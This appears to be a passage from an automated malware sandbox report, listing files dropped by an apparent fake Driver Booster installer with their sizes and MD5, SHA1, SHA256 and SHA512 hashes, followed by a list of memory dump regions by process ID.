ce34e28d066cd9b18d7fd7877c61481dfb6767cb

SHA256
c79920873a439db91c50ec806da982920d8b3d06f9fdfda0b457acaa6220606a

SHA512
ef79c00a3d4c7a66872cc55400f4db14f106f5a5852798fc98df298f801cddc744d20648dfeea2bfee229496cf6cefbe2b92925b82e579c4f6fa26e4c507de43

Download Submit
C:\ProgramData\eICJv\extracted\ANTIAV~1.DAT
Filesize
2.0MB

MD5
8ceec208145b1d1f26fc47503edb0a80

SHA1
29933f0907627f967044df7e297c3b806f4ca39d

SHA256
ae3a9d6b2f49629750beedd4f0708b899b6b79b27cf904521e89e017794534eb

SHA512
26b2eed60d4217b8cb95a6e6674b6feaba16b5660e6420f78f2467e1e20c51637b29a8c79e44526a43cccea5827d120d5804957e4dcc429c4bbfcf14aae72b9b

Download Submit
C:\ProgramData\eICJv\extracted\file_1.zip
Filesize
1.2MB

MD5
506fce55cfc87027055296a6a2863826

SHA1
43752a732db857183b87d552377b00515427db39

SHA256
610c870b3bdb17010f9d866b705e999b49c477e6ed3727774b4b5f311da2cf8a

SHA512
bc459438522960a94fefc6aa838631275b24518a800255716811e3c6cd924cbe431ccc88d974f269058655de674d43e977e83361a3821bfe0328ef64b87ff785

Download Submit
C:\ProgramData\eICJv\extracted\file_2.zip
Filesize
1.2MB

MD5
0a1fb9ad84cf9697f6092ffa9f43a2b4

SHA1
7a8a747117b8722a53ce7564dda55872554cb004

SHA256
80e16abd7da579d0f29eacabd1a1898a887a95fd9e7d3360c96d6a9ff8f95710

SHA512
5521e83d8b38ffa7bb67d19b07802c2606852c4fe59d9bfc8106e1cee1f091d42d262174f49e0d91c0b404162a24516143a1dd4d2349320344186da9b416a8e0

Download Submit
C:\ProgramData\eICJv\extracted\file_3.zip
Filesize
2.7MB

MD5
0cbfe9677da8a8edb981106803628708

SHA1
2d9b5b2db605b452c7ad3c14ac55bffe97f84b52

SHA256
df6102a874cb0b19e8ab9ecef406bc6965d7c9b3bbf394eadd07aad33263e0df

SHA512
1a3a45179d4a3af16231dea3394d73aa1322f39a01218ec912bc94cf435f5988560c2573fc03b09f82634704cd38f1d790b8469889d402de233a52c22111d6b5

Download Submit
C:\ProgramData\eICJv\extracted\iMtu_gQB.exe
Filesize
1.9MB

MD5
dd0146c74694b0d0a32bab320a8a9ee5

SHA1
e706f8d4f153b5c60e502f947bded7950f19a901

SHA256
429955ad9594118c2d2120d9ed0a0c2d68ed0b605dd948cc8f29055f45ca4035

SHA512
72bb8daa6eec9edb871dc515049e82851aec29e8d0828093a214a893e210342d5b66b5bed2ee9c27b5463ad5b29df2639078f42a44357ffd5c62cc10b951b1b1

Download Submit
C:\ProgramData\eICJv\file.bin
Filesize
2.7MB

MD5
b3d91bf02bb2ed70c3d8f8e0ab7488a1

SHA1
d4eeede743d167d40975d0cc2387a36b80365c31

SHA256
f6f91250f54fb99b54acd1c421589edb1a2224cf6818d7b0dd3890971a1c1787

SHA512
2e12621b5adfe433ae5a96b82946fe0a3c37e4abd6c319fc2c7c1a1d30449630e5beaab515ea0316f19883ba7c4ad7519b5d6facf47b69be940de8e96c9fe274

Download Submit
C:\ProgramData\eICJv\iMtu_gQB.exe
Filesize
1.9MB

MD5
dd0146c74694b0d0a32bab320a8a9ee5

SHA1
e706f8d4f153b5c60e502f947bded7950f19a901

SHA256
429955ad9594118c2d2120d9ed0a0c2d68ed0b605dd948cc8f29055f45ca4035

SHA512
72bb8daa6eec9edb871dc515049e82851aec29e8d0828093a214a893e210342d5b66b5bed2ee9c27b5463ad5b29df2639078f42a44357ffd5c62cc10b951b1b1

Download Submit
C:\ProgramData\eICJv\main.bat
Filesize
407B

MD5
d6b76e5702e5878373d5ef3078aee188

SHA1
ab4af65c920efb012d698a48dc65156c12213c12

SHA256
426beead9653cd7081fe00afe57690b84bb419e43825943251af3aae52a39465

SHA512
fa2d19be96ad40b37b01ed71f3d4359a84738e371e16f1fef933a3f77b3a856a6ad27b055cebb977b1ee772a82e070754b856f39023b8f55522d8e8b589eec03

Download Submit
C:\Users\Admin\AppData\Local\Temp\4acacee3-cefe-4dab-b6f1-01f9a63ec79a\e.dll
Filesize
94KB

MD5
14ff402962ad21b78ae0b4c43cd1f194

SHA1
f8a510eb26666e875a5bdd1cadad40602763ad72

SHA256
fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b

SHA512
daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-1LABG.tmp\c83a43c9645f2716288130f311314b673e66e20084b432ce3b8ce8cdf39782c8.tmp
Filesize
2.4MB

MD5
a88faf8a031cfac67333a10cc3a078ac

SHA1
d63630e283e3d190dbdea7e3e24739a1e270881a

SHA256
55c62e226bd77e77a9b8518f268ccb5cba696885290366633d86bc6776dcede1

SHA512
489292a1a3094c43fc42dec23baaa00a0051e7f214e53529b72b2ca9c537cf7ad2d5b82030d3c7537ccc88ef1d348aca97e6369be6add0f9dcd0cf615b23f8c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-652D1.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8JFOC.tmp\Driver.Booster.7.5.0.751.tmp
Filesize
1.2MB

MD5
790761a71cb61ac50c7d04b3da72a167

SHA1
6558d25b86327810bf34f256fdf4dd94127992e2

SHA256
8336a622b1b6469a2b2834381e4a15d39988145e1915c249be8dd359ebd28e68

SHA512
90b9d09e59c06c3b7e3c0eb45e072fcf4eeb846f8a43179ce7910ef1faa0b15c85c187a509c1b3d308b3f5b06518c17c9ce9a668a11bf22a4495f0c593a99ad3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N7TC6.tmp\b2p.dll
Filesize
22KB

MD5
ab35386487b343e3e82dbd2671ff9dab

SHA1
03591d07aea3309b631a7d3a6e20a92653e199b8

SHA256
c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

SHA512
b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N7TC6.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N7TC6.tmp\botva2.dll
Filesize
37KB

MD5
67965a5957a61867d661f05ae1f4773e

SHA1
f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

SHA256
450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

SHA512
c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-N7TC6.tmp\iswin7logo.dll
Filesize
39KB

MD5
1ea948aad25ddd347d9b80bef6df9779

SHA1
0be971e67a6c3b1297e572d97c14f74b05dafed3

SHA256
30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

SHA512
f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

Download Submit
memory/228-155-0x0000000000000000-mapping.dmp

Download
memory/316-154-0x0000000000000000-mapping.dmp

Download
memory/428-214-0x0000000000000000-mapping.dmp

Download
memory/452-174-0x0000000000000000-mapping.dmp

Download
memory/536-188-0x0000000000000000-mapping.dmp

Download
memory/748-143-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/748-136-0x0000000000000000-mapping.dmp

Download
memory/748-138-0x0000000000400000-0x000000000045F000-memory.dmp

Filesize
380KB

Download
memory/840-169-0x0000000000000000-mapping.dmp

Download
memory/860-170-0x0000000000000000-mapping.dmp

Download
memory/964-177-0x0000000000000000-mapping.dmp

Download
memory/1044-203-0x0000000000000000-mapping.dmp

Download
memory/1296-198-0x0000000000000000-mapping.dmp

Download
memory/1376-193-0x0000000000000000-mapping.dmp

Download
memory/1416-157-0x0000000000000000-mapping.dmp

Download
memory/1564-189-0x0000000000000000-mapping.dmp

Download
memory/1600-158-0x0000000000000000-mapping.dmp

Download
memory/1660-194-0x0000000000000000-mapping.dmp

Download
memory/1828-159-0x0000000000000000-mapping.dmp

Download
memory/1912-162-0x0000000000000000-mapping.dmp

Download
memory/1928-134-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/1928-130-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/2012-161-0x0000000000000000-mapping.dmp

Download
memory/2052-163-0x0000000000000000-mapping.dmp

Download
memory/2120-168-0x0000000000000000-mapping.dmp

Download
memory/2216-182-0x0000000000000000-mapping.dmp

Download
memory/2644-210-0x0000000000000000-mapping.dmp

Download
memory/2864-160-0x0000000000000000-mapping.dmp

Download
memory/2900-216-0x0000000000000000-mapping.dmp

Download
memory/3008-204-0x0000000000000000-mapping.dmp

Download
memory/3024-165-0x0000000000000000-mapping.dmp

Download
memory/3152-152-0x0000000000000000-mapping.dmp

Download
memory/3316-156-0x0000000000000000-mapping.dmp

Download
memory/3328-183-0x0000000000000000-mapping.dmp

Download
memory/3640-171-0x0000000000000000-mapping.dmp

Download
memory/3700-145-0x0000000000000000-mapping.dmp

Download
memory/3952-175-0x0000000000000000-mapping.dmp

Download
memory/3972-180-0x0000000000000000-mapping.dmp

Download
memory/4000-185-0x0000000000000000-mapping.dmp

Download
memory/4148-207-0x0000000000000000-mapping.dmp

Download
memory/4148-221-0x0000000074250000-0x00000000742D9000-memory.dmp

Filesize
548KB

Download
memory/4148-219-0x0000000005470000-0x0000000005502000-memory.dmp

Filesize
584KB

Download
memory/4148-218-0x0000000005380000-0x00000000053C4000-memory.dmp

Filesize
272KB

Download
memory/4148-217-0x0000000005880000-0x0000000005E24000-memory.dmp

Filesize
5.6MB

Download
memory/4148-215-0x00000000002C0000-0x00000000004A0000-memory.dmp

Filesize
1.9MB

Download
memory/4272-176-0x0000000000000000-mapping.dmp

Download
memory/4348-167-0x0000000000000000-mapping.dmp

Download
memory/4444-166-0x0000000000000000-mapping.dmp

Download
memory/4624-132-0x0000000000000000-mapping.dmp

Download
memory/4888-178-0x0000000000000000-mapping.dmp

Download
memory/4924-213-0x0000000000000000-mapping.dmp

Download
memory/4944-172-0x0000000000000000-mapping.dmp

Download
memory/4968-212-0x0000000000000000-mapping.dmp

Download
memory/4988-201-0x0000000000000000-mapping.dmp

Download
memory/5024-179-0x0000000000000000-mapping.dmp

Download
memory/5044-209-0x0000000000000000-mapping.dmp

Download
memory/5048-149-0x00000000096E0000-0x00000000096EF000-memory.dmp

Filesize
60KB

Download
memory/5048-141-0x0000000000000000-mapping.dmp

Download
memory/5048-223-0x0000000073AC0000-0x0000000073ADB000-memory.dmp

Filesize
108KB

Download
memory/5048-224-0x00000000008C0000-0x00000000008C3000-memory.dmp

Filesize
12KB

Download
memory/5092-211-0x0000000000000000-mapping.dmp

Download